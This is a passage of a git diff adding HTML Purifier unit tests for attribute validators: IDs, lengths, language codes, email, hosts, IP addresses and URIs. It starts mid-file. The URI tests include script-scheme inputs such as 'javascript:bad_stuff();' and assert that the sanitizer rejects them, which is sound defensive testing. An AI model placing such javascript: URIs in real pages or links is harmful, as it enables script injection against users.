$this->config->set('Attr.IDPrefix', ''); + $this->config->set('Attr.IDPrefixLocal', 'story95_'); + $this->expectError('%Attr.IDPrefixLocal cannot be used unless '. + '%Attr.IDPrefix is set'); + $this->assertDef('amherst'); + + } + + // reference functionality is disabled for now + function disabled_testIDReference() { + + $this->def = new HTMLPurifier_AttrDef_HTML_ID(true); + + $this->assertDef('good_id'); + $this->assertDef('good_id'); // duplicates okay + $this->assertDef('<b>', false); + + $this->def = new HTMLPurifier_AttrDef_HTML_ID(); + + $this->assertDef('good_id'); + $this->assertDef('good_id', false); // duplicate now not okay + + $this->def = new HTMLPurifier_AttrDef_HTML_ID(true); + + $this->assertDef('good_id'); // reference still okay + + } + + function testRegexp() { + + $this->config->set('Attr.IDBlacklistRegexp', '/^g_/'); + + $this->assertDef('good_id'); + $this->assertDef('g_bad_id', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LengthTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LengthTest.php new file mode 100644 index 000000000..d165e30b5 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LengthTest.php @@ -0,0 +1,32 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_LengthTest extends HTMLPurifier_AttrDef_HTML_PixelsTest +{ + + function setup() { + $this->def = new HTMLPurifier_AttrDef_HTML_Length(); + } + + function test() { + + // pixel check + parent::test(); + + // percent check + $this->assertDef('25%'); + + // Firefox maintains percent, so will we + $this->assertDef('0%'); + + // 0% <= percent <= 100% + $this->assertDef('-15%', '0%'); + $this->assertDef('120%', '100%'); + + // fractional percents, apparently, aren't allowed + $this->assertDef('56.5%', '56%'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LinkTypesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LinkTypesTest.php new file mode 100644 index 000000000..d90b65b1f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/LinkTypesTest.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_LinkTypesTest extends HTMLPurifier_AttrDefHarness +{ + + function testNull() { + + $this->def = new HTMLPurifier_AttrDef_HTML_LinkTypes('rel'); + $this->config->set('Attr.AllowedRel', array('nofollow', 'foo')); + + $this->assertDef('', false); + $this->assertDef('nofollow', true); + $this->assertDef('nofollow foo', true); + $this->assertDef('nofollow bar', 'nofollow'); + $this->assertDef('bar', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/MultiLengthTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/MultiLengthTest.php new file mode 100644 index 000000000..eb6f34011 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/MultiLengthTest.php @@ -0,0 +1,28 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_MultiLengthTest extends HTMLPurifier_AttrDef_HTML_LengthTest +{ + + function setup() { + $this->def = new HTMLPurifier_AttrDef_HTML_MultiLength(); + } + + function test() { + + // length check + parent::test(); + + $this->assertDef('*'); + $this->assertDef('1*', '*'); + $this->assertDef('56*'); + + $this->assertDef('**', false); // plain old bad + + $this->assertDef('5.4*', '5*'); // no decimals + $this->assertDef('-3*', false); // no negatives + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/NmtokensTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/NmtokensTest.php new file mode 100644 index 000000000..bb64ff6e2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/NmtokensTest.php @@ -0,0 +1,35 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_NmtokensTest extends HTMLPurifier_AttrDefHarness +{ + + function setUp() { + parent::setUp(); + $this->def = new HTMLPurifier_AttrDef_HTML_Nmtokens(); + } + + function testDefault() { + + $this->assertDef('valid'); + $this->assertDef('a0-_'); + $this->assertDef('-valid'); + $this->assertDef('_valid'); + $this->assertDef('double valid'); + + $this->assertDef('0invalid', false); + $this->assertDef('-0', false); + + // test conditional replacement + $this->assertDef('validassoc 0invalid', 'validassoc'); + + // test whitespace leniency + $this->assertDef(" double\nvalid\r", 'double valid'); + + // test case sensitivity + $this->assertDef('VALID'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/PixelsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/PixelsTest.php new file mode 100644 index 000000000..08f25be64 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/HTML/PixelsTest.php @@ -0,0 +1,45 @@ +<?php + +class HTMLPurifier_AttrDef_HTML_PixelsTest extends HTMLPurifier_AttrDefHarness +{ + + function setup() { + $this->def = new HTMLPurifier_AttrDef_HTML_Pixels(); + } + + function test() { + + $this->assertDef('1'); + $this->assertDef('0'); + + $this->assertDef('2px', '2'); // rm px suffix + + $this->assertDef('dfs', false); // totally invalid value + + // conceivably we could repair this value, but we won't for now + $this->assertDef('9in', false); + + // test trim + $this->assertDef(' 45 ', '45'); + + // no negatives + $this->assertDef('-2', '0'); + + // remove empty + $this->assertDef('', false); + + // round down + $this->assertDef('4.9', '4'); + + } + + function test_make() { + $factory = new HTMLPurifier_AttrDef_HTML_Pixels(); + $this->def = $factory->make('30'); + $this->assertDef('25'); + $this->assertDef('35', '30'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/IntegerTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/IntegerTest.php new file mode 100644 index 000000000..a941e31ab --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/IntegerTest.php @@ -0,0 +1,61 @@ +<?php + +class HTMLPurifier_AttrDef_IntegerTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_Integer(); + + $this->assertDef('0'); + $this->assertDef('1'); + $this->assertDef('-1'); + $this->assertDef('-10'); + $this->assertDef('14'); + $this->assertDef('+24', '24'); + $this->assertDef(' 14 ', '14'); + $this->assertDef('-0', '0'); + + $this->assertDef('-1.4', false); + $this->assertDef('3.4', false); + $this->assertDef('asdf', false); // must not return zero + $this->assertDef('2in', false); // must not return zero + + } + + function assertRange($negative, $zero, $positive) { + $this->assertDef('-100', $negative); + $this->assertDef('-1', $negative); + $this->assertDef('0', $zero); + $this->assertDef('1', $positive); + $this->assertDef('42', $positive); + } + + function testRange() { + + $this->def = new HTMLPurifier_AttrDef_Integer(false); + $this->assertRange(false, true, true); // non-negative + + $this->def = new HTMLPurifier_AttrDef_Integer(false, false); + $this->assertRange(false, false, true); // positive + + + // fringe cases + + $this->def = new HTMLPurifier_AttrDef_Integer(false, false, false); + $this->assertRange(false, false, false); // allow none + + $this->def = new HTMLPurifier_AttrDef_Integer(true, false, false); + $this->assertRange(true, false, false); // negative + + $this->def = new HTMLPurifier_AttrDef_Integer(false, true, false); + $this->assertRange(false, true, false); // zero + + $this->def = new HTMLPurifier_AttrDef_Integer(true, true, false); + $this->assertRange(true, true, false); // non-positive + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/LangTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/LangTest.php new file mode 100644 index 000000000..c59175556 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/LangTest.php @@ -0,0 +1,85 @@ +<?php + +class HTMLPurifier_AttrDef_LangTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_Lang(); + + // basic good uses + $this->assertDef('en'); + $this->assertDef('en-us'); + + $this->assertDef(' en ', 'en'); // trim + $this->assertDef('EN', 'en'); // case insensitivity + + // (thanks Eugen Pankratz for noticing the typos!) + $this->assertDef('En-Us-Edison', 'en-us-edison'); // complex ci + + $this->assertDef('fr en', false); // multiple languages + $this->assertDef('%', false); // bad character + + // test overlong language according to syntax + $this->assertDef('thisistoolongsoitgetscut', false); + + // primary subtag rules + // I'm somewhat hesitant to allow x and i as primary language codes, + // because they usually are never used in real life. However, + // theoretically speaking, having them alone is permissable, so + // I'll be lenient. No XML parser is going to complain anyway. + $this->assertDef('x'); + $this->assertDef('i'); + // real world use-cases + $this->assertDef('x-klingon'); + $this->assertDef('i-mingo'); + // because the RFC only defines two and three letter primary codes, + // anything with a length of four or greater is invalid, despite + // the syntax stipulation of 1 to 8 characters. Because the RFC + // specifically states that this reservation is in order to allow + // for future versions to expand, the adoption of a new RFC will + // require these test cases to be rewritten, even if backwards- + // compatibility is largely retained (i.e. this is not forwards + // compatible) + $this->assertDef('four', false); + // for similar reasons, disallow any other one character language + $this->assertDef('f', false); + + // second subtag rules + // one letter subtags prohibited until revision. This is, however, + // less volatile than the restrictions on the primary subtags. + // Also note that this test-case tests fix-behavior: chop + // off subtags until you get a valid language code. + $this->assertDef('en-a', 'en'); + // however, x is a reserved single-letter subtag that is allowed + $this->assertDef('en-x', 'en-x'); + // 2-8 chars are permitted, but have special meaning that cannot + // be checked without maintaining country code lookup tables (for + // two characters) or special registration tables (for all above). + $this->assertDef('en-uk', true); + + // further subtag rules: only syntactic constraints + $this->assertDef('en-us-edison'); + $this->assertDef('en-us-toolonghaha', 'en-us'); + $this->assertDef('en-us-a-silly-long-one'); + + // rfc 3066 stipulates that if a three letter and a two letter code + // are available, the two letter one MUST be used. Without a language + // code lookup table, we cannot implement this functionality. + + // although the HTML protocol, technically speaking, allows you to + // omit language tags, this implicitly means that the parent element's + // language is the one applicable, which, in some cases, is incorrect. + // Thus, we allow und, only slightly defying the RFC's SHOULD NOT + // designation. + $this->assertDef('und'); + + // because attributes only allow one language, mul is allowed, complying + // with the RFC's SHOULD NOT designation. + $this->assertDef('mul'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/SwitchTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/SwitchTest.php new file mode 100644 index 000000000..21bafe697 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/SwitchTest.php @@ -0,0 +1,34 @@ +<?php + +class HTMLPurifier_AttrDef_SwitchTest extends HTMLPurifier_AttrDefHarness +{ + + protected $with, $without; + + function setUp() { + parent::setUp(); + generate_mock_once('HTMLPurifier_AttrDef'); + $this->with = new HTMLPurifier_AttrDefMock(); + $this->without = new HTMLPurifier_AttrDefMock(); + $this->def = new HTMLPurifier_AttrDef_Switch('tag', $this->with, $this->without); + } + + function testWith() { + $token = new HTMLPurifier_Token_Start('tag'); + $this->context->register('CurrentToken', $token); + $this->with->expectOnce('validate'); + $this->with->setReturnValue('validate', 'foo'); + $this->assertDef('bar', 'foo'); + } + + function testWithout() { + $token = new HTMLPurifier_Token_Start('other-tag'); + $this->context->register('CurrentToken', $token); + $this->without->expectOnce('validate'); + $this->without->setReturnValue('validate', 'foo'); + $this->assertDef('bar', 'foo'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/TextTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/TextTest.php new file mode 100644 index 000000000..458008aa8 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/TextTest.php @@ -0,0 +1,17 @@ +<?php + +class HTMLPurifier_AttrDef_TextTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_Text(); + + $this->assertDef('This is spiffy text!'); + $this->assertDef(" Casual\tCDATA parse\ncheck. ", 'Casual CDATA parse check.'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/Email/SimpleCheckTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/Email/SimpleCheckTest.php new file mode 100644 index 000000000..c310347e9 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/Email/SimpleCheckTest.php @@ -0,0 +1,13 @@ +<?php + +class HTMLPurifier_AttrDef_URI_Email_SimpleCheckTest + extends HTMLPurifier_AttrDef_URI_EmailHarness +{ + + function setUp() { + $this->def = new HTMLPurifier_AttrDef_URI_Email_SimpleCheck(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/EmailHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/EmailHarness.php new file mode 100644 index 000000000..594e2ce29 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/EmailHarness.php @@ -0,0 +1,31 @@ +<?php + +class HTMLPurifier_AttrDef_URI_EmailHarness extends HTMLPurifier_AttrDefHarness +{ + + /** + * Tests common email strings that are obviously pass/fail + */ + function testCore() { + $this->assertDef('bob@example.com'); + $this->assertDef(' bob@example.com ', 'bob@example.com'); + $this->assertDef('bob.thebuilder@example.net'); + $this->assertDef('Bob_the_Builder-the-2nd@example.org'); + $this->assertDef('Bob%20the%20Builder@white-space.test'); + + // extended format, with real name + //$this->assertDef('Bob%20Builder%20%3Cbobby.bob.bob@it.is.example.com%3E'); + //$this->assertDef('Bob Builder <bobby.bob.bob@it.is.example.com>'); + + // time to fail + $this->assertDef('bob', false); + $this->assertDef('bob@home@work', false); + $this->assertDef('@example.com', false); + $this->assertDef('bob@', false); + $this->assertDef('', false); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/HostTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/HostTest.php new file mode 100644 index 000000000..b5827718b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/HostTest.php @@ -0,0 +1,53 @@ +<?php + +// takes a URI formatted host and validates it + + +class HTMLPurifier_AttrDef_URI_HostTest extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_URI_Host(); + + $this->assertDef('[2001:DB8:0:0:8:800:200C:417A]'); // IPv6 + $this->assertDef('124.15.6.89'); // IPv4 + $this->assertDef('www.google.com'); // reg-name + + // more domain name tests + $this->assertDef('test.'); + $this->assertDef('sub.test.'); + $this->assertDef('.test', false); + $this->assertDef('ff'); + $this->assertDef('1f', false); + $this->assertDef('-f', false); + $this->assertDef('f1'); + $this->assertDef('f-', false); + $this->assertDef('sub.ff'); + $this->assertDef('sub.1f', false); + $this->assertDef('sub.-f', false); + $this->assertDef('sub.f1'); + $this->assertDef('sub.f-', false); + $this->assertDef('ff.top'); + $this->assertDef('1f.top'); + $this->assertDef('-f.top', false); + $this->assertDef('ff.top'); + $this->assertDef('f1.top'); + $this->assertDef('f-.top', false); + + $this->assertDef("\xE4\xB8\xAD\xE6\x96\x87.com.cn", false); + + } + + function testIDNA() { + if (!$GLOBALS['HTMLPurifierTest']['Net_IDNA2']) { + return false; + } + $this->config->set('Core.EnableIDNA', true); + $this->assertDef("\xE4\xB8\xAD\xE6\x96\x87.com.cn", "xn--fiq228c.com.cn"); + $this->assertDef("\xe2\x80\x85.com", false); // rejected + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv4Test.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv4Test.php new file mode 100644 index 000000000..0a4eb17ba --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv4Test.php @@ -0,0 +1,25 @@ +<?php + +// IPv4 test case is spliced from Feyd's IPv6 implementation +// we ought to disallow non-routable addresses + +class HTMLPurifier_AttrDef_URI_IPv4Test extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_URI_IPv4(); + + $this->assertDef('127.0.0.1'); // standard IPv4, loopback, non-routable + $this->assertDef('0.0.0.0'); // standard IPv4, unspecified, non-routable + $this->assertDef('255.255.255.255'); // standard IPv4 + + $this->assertDef('300.0.0.0', false); // standard IPv4, out of range + $this->assertDef('124.15.6.89/60', false); // standard IPv4, prefix not allowed + + $this->assertDef('', false); // nothing + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv6Test.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv6Test.php new file mode 100644 index 000000000..083e818aa --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URI/IPv6Test.php @@ -0,0 +1,43 @@ +<?php + +// test case is from Feyd's IPv6 implementation +// we ought to disallow non-routable addresses + +class HTMLPurifier_AttrDef_URI_IPv6Test extends HTMLPurifier_AttrDefHarness +{ + + function test() { + + $this->def = new HTMLPurifier_AttrDef_URI_IPv6(); + + $this->assertDef('2001:DB8:0:0:8:800:200C:417A'); // unicast, full + $this->assertDef('FF01:0:0:0:0:0:0:101'); // multicast, full + $this->assertDef('0:0:0:0:0:0:0:1'); // loopback, full + $this->assertDef('0:0:0:0:0:0:0:0'); // unspecified, full + $this->assertDef('2001:DB8::8:800:200C:417A'); // unicast, compressed + $this->assertDef('FF01::101'); // multicast, compressed + + $this->assertDef('::1'); // loopback, compressed, non-routable + $this->assertDef('::'); // unspecified, compressed, non-routable + $this->assertDef('0:0:0:0:0:0:13.1.68.3'); // IPv4-compatible IPv6 address, full, deprecated + $this->assertDef('0:0:0:0:0:FFFF:129.144.52.38'); // IPv4-mapped IPv6 address, full + $this->assertDef('::13.1.68.3'); // IPv4-compatible IPv6 address, compressed, deprecated + $this->assertDef('::FFFF:129.144.52.38'); // IPv4-mapped IPv6 address, compressed + $this->assertDef('2001:0DB8:0000:CD30:0000:0000:0000:0000/60'); // full, with prefix + $this->assertDef('2001:0DB8::CD30:0:0:0:0/60'); // compressed, with prefix + $this->assertDef('2001:0DB8:0:CD30::/60'); // compressed, with prefix #2 + $this->assertDef('::/128'); // compressed, unspecified address type, non-routable + $this->assertDef('::1/128'); // compressed, loopback address type, non-routable + $this->assertDef('FF00::/8'); // compressed, multicast address type + $this->assertDef('FE80::/10'); // compressed, link-local unicast, non-routable + $this->assertDef('FEC0::/10'); // compressed, site-local unicast, deprecated + + $this->assertDef('2001:DB8:0:0:8:800:200C:417A:221', false); // unicast, full + $this->assertDef('FF01::101::2', false); //multicast, compressed + $this->assertDef('', false); // nothing + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URITest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URITest.php new file mode 100644 index 000000000..3044367a2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDef/URITest.php @@ -0,0 +1,146 @@ +<?php + +/** + * @todo Aim for complete code coverage with mocks + */ +class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness +{ + + function setUp() { + $this->def = new HTMLPurifier_AttrDef_URI(); + parent::setUp(); + } + + function testIntegration() { + $this->assertDef('http://www.google.com/'); + $this->assertDef('http:', ''); + $this->assertDef('http:/foo', '/foo'); + $this->assertDef('javascript:bad_stuff();', false); + $this->assertDef('ftp://www.example.com/'); + $this->assertDef('news:rec.alt'); + $this->assertDef('nntp://news.example.com/324234'); + $this->assertDef('mailto:bob@example.com'); + } + + function testIntegrationWithPercentEncoder() { + $this->assertDef( + 'http://www.example.com/%56%fc%GJ%5%FC', + 'http://www.example.com/V%FC%25GJ%255%FC' + ); + } + + function testPercentEncoding() { + $this->assertDef( + 'http:colon:mercenary', + 'colon%3Amercenary' + ); + } + + function testPercentEncodingPreserve() { + $this->assertDef( + 'http://www.example.com/abcABC123-_.!~*()\'' + ); + } + + function testEmbeds() { + $this->def = new HTMLPurifier_AttrDef_URI(true); + $this->assertDef('http://sub.example.com/alas?foo=asd'); + $this->assertDef('mailto:foo@example.com', false); + } + + function testConfigMunge() { + $this->config->set('URI.Munge', 'http://www.google.com/url?q=%s'); + $this->assertDef( + 'http://www.example.com/', + 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' + ); + $this->assertDef('index.html'); + $this->assertDef('javascript:foobar();', false); + } + + function testDefaultSchemeRemovedInBlank() { + $this->assertDef('http:', ''); + } + + function testDefaultSchemeRemovedInRelativeURI() { + $this->assertDef('http:/foo/bar', '/foo/bar'); + } + + function testDefaultSchemeNotRemovedInAbsoluteURI() { + $this->assertDef('http://example.com/foo/bar'); + } + + function testAltSchemeNotRemoved() { + $this->assertDef('mailto:this-looks-like-a-path@example.com'); + } + + function testResolveNullSchemeAmbiguity() { + $this->assertDef('///foo', '/foo'); + } + + function testResolveNullSchemeDoubleAmbiguity() { + $this->config->set('URI.Host', 'example.com'); + $this->assertDef('////foo', '//example.com//foo'); + } + + function testURIDefinitionValidation() { + $parser = new HTMLPurifier_URIParser(); + $uri = $parser->parse('http://example.com'); + $this->config->set('URI.DefinitionID', 'HTMLPurifier_AttrDef_URITest->testURIDefinitionValidation'); + + generate_mock_once('HTMLPurifier_URIDefinition'); + $uri_def = new HTMLPurifier_URIDefinitionMock(); + $uri_def->expectOnce('filter', array($uri, '*', '*')); + $uri_def->setReturnValue('filter', true, array($uri, '*', '*')); + $uri_def->expectOnce('postFilter', array($uri, '*', '*')); + $uri_def->setReturnValue('postFilter', true, array($uri, '*', '*')); + $uri_def->setup = true; + + // Since definitions are no longer passed by reference, we need + // to muck around with the cache to insert our mock. This is + // technically a little bad, since the cache shouldn't change + // behavior, but I don't feel too good about letting users + // overload entire definitions. + generate_mock_once('HTMLPurifier_DefinitionCache'); + $cache_mock = new HTMLPurifier_DefinitionCacheMock(); + $cache_mock->setReturnValue('get', $uri_def); + + generate_mock_once('HTMLPurifier_DefinitionCacheFactory'); + $factory_mock = new HTMLPurifier_DefinitionCacheFactoryMock(); + $old = HTMLPurifier_DefinitionCacheFactory::instance(); + HTMLPurifier_DefinitionCacheFactory::instance($factory_mock); + $factory_mock->setReturnValue('create', $cache_mock); + + $this->assertDef('http://example.com'); + + HTMLPurifier_DefinitionCacheFactory::instance($old); + } + + function test_make() { + $factory = new HTMLPurifier_AttrDef_URI(); + $def = $factory->make(''); + $def2 = new HTMLPurifier_AttrDef_URI(); + $this->assertIdentical($def, $def2); + + $def = $factory->make('embedded'); + $def2 = new HTMLPurifier_AttrDef_URI(true); + $this->assertIdentical($def, $def2); + } + + /* + function test_validate_configWhitelist() { + + $this->config->set('URI.HostPolicy', 'DenyAll'); + $this->config->set('URI.HostWhitelist', array(null, 'google.com')); + + $this->assertDef('http://example.com/fo/google.com', false); + $this->assertDef('server.txt'); + $this->assertDef('ftp://www.google.com/?t=a'); + $this->assertDef('http://google.com.tricky.spamsite.net', false); + + } + */ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDefHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDefHarness.php new file mode 100644 index 000000000..b45b0ca53 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDefHarness.php @@ -0,0 +1,27 @@ +<?php + +class HTMLPurifier_AttrDefHarness extends HTMLPurifier_Harness +{ + + protected $def; + protected $context, $config; + + public function setUp() { + $this->config = HTMLPurifier_Config::createDefault(); + $this->context = new HTMLPurifier_Context(); + } + + // cannot be used for accumulator + function assertDef($string, $expect = true) { + // $expect can be a string or bool + $result = $this->def->validate($string, $this->config, $this->context); + if ($expect === true) { + $this->assertIdentical($string, $result); + } else { + $this->assertIdentical($expect, $result); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrDefTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrDefTest.php new file mode 100644 index 000000000..d7466e37d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrDefTest.php @@ -0,0 +1,32 @@ +<?php + +Mock::generatePartial( + 'HTMLPurifier_AttrDef', + 'HTMLPurifier_AttrDefTestable', + array('validate')); + +class HTMLPurifier_AttrDefTest extends HTMLPurifier_Harness +{ + + function test_parseCDATA() { + + $def = new HTMLPurifier_AttrDefTestable(); + + $this->assertIdentical('', $def->parseCDATA('')); + $this->assertIdentical('', $def->parseCDATA("\t\n\r \t\t")); + $this->assertIdentical('foo', $def->parseCDATA("\t\n\r foo\t\t")); + $this->assertIdentical('translate to space', $def->parseCDATA("translate\nto\tspace")); + + } + + function test_make() { + + $def = new HTMLPurifier_AttrDefTestable(); + $def2 = $def->make(''); + $this->assertIdentical($def, $def2); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BackgroundTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BackgroundTest.php new file mode 100644 index 000000000..0730ab4bc --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BackgroundTest.php @@ -0,0 +1,40 @@ +<?php + +class HTMLPurifier_AttrTransform_BackgroundTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Background(); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testBasicTransform() { + $this->assertResult( + array('background' => 'logo.png'), + array('style' => 'background-image:url(logo.png);') + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('background' => 'logo.png', 'style' => 'font-weight:bold'), + array('style' => 'background-image:url(logo.png);font-weight:bold') + ); + } + + function testLenientTreatmentOfInvalidInput() { + // notice that we rely on the CSS validator later to fix this invalid + // stuff + $this->assertResult( + array('background' => 'logo.png);foo:('), + array('style' => 'background-image:url(logo.png);foo:();') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BdoDirTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BdoDirTest.php new file mode 100644 index 000000000..cdf6f8a9b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BdoDirTest.php @@ -0,0 +1,30 @@ +<?php + +class HTMLPurifier_AttrTransform_BdoDirTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_BdoDir(); + } + + function testAddDefaultDir() { + $this->assertResult( array(), array('dir' => 'ltr') ); + } + + function testPreserveExistingDir() { + $this->assertResult( array('dir' => 'rtl') ); + } + + function testAlternateDefault() { + $this->config->set('Attr.DefaultTextDir', 'rtl'); + $this->assertResult( + array(), + array('dir' => 'rtl') + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BgColorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BgColorTest.php new file mode 100644 index 000000000..13567b74e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BgColorTest.php @@ -0,0 +1,44 @@ +<?php + +// we currently rely on the CSS validator to fix any problems. +// This means that this transform, strictly speaking, supports +// a superset of the functionality. + +class HTMLPurifier_AttrTransform_BgColorTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_BgColor(); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testBasicTransform() { + $this->assertResult( + array('bgcolor' => '#000000'), + array('style' => 'background-color:#000000;') + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('bgcolor' => '#000000', 'style' => 'font-weight:bold'), + array('style' => 'background-color:#000000;font-weight:bold') + ); + } + + function testLenientTreatmentOfInvalidInput() { + // this may change when we natively support the datatype and + // validate its contents before forwarding it on + $this->assertResult( + array('bgcolor' => '#F00'), + array('style' => 'background-color:#F00;') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BoolToCSSTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BoolToCSSTest.php new file mode 100644 index 000000000..73f9d6b86 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BoolToCSSTest.php @@ -0,0 +1,38 @@ +<?php + +class HTMLPurifier_AttrTransform_BoolToCSSTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_BoolToCSS('foo', 'bar:3in;'); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testBasicTransform() { + $this->assertResult( + array('foo' => 'foo'), + array('style' => 'bar:3in;') + ); + } + + function testIgnoreValueOfBooleanAttribute() { + $this->assertResult( + array('foo' => 'no'), + array('style' => 'bar:3in;') + ); + } + + function testPrependCSS() { + $this->assertResult( + array('foo' => 'foo', 'style' => 'background-color:#F00;'), + array('style' => 'bar:3in;background-color:#F00;') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BorderTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BorderTest.php new file mode 100644 index 000000000..d10aa28e6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/BorderTest.php @@ -0,0 +1,38 @@ +<?php + +class HTMLPurifier_AttrTransform_BorderTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() 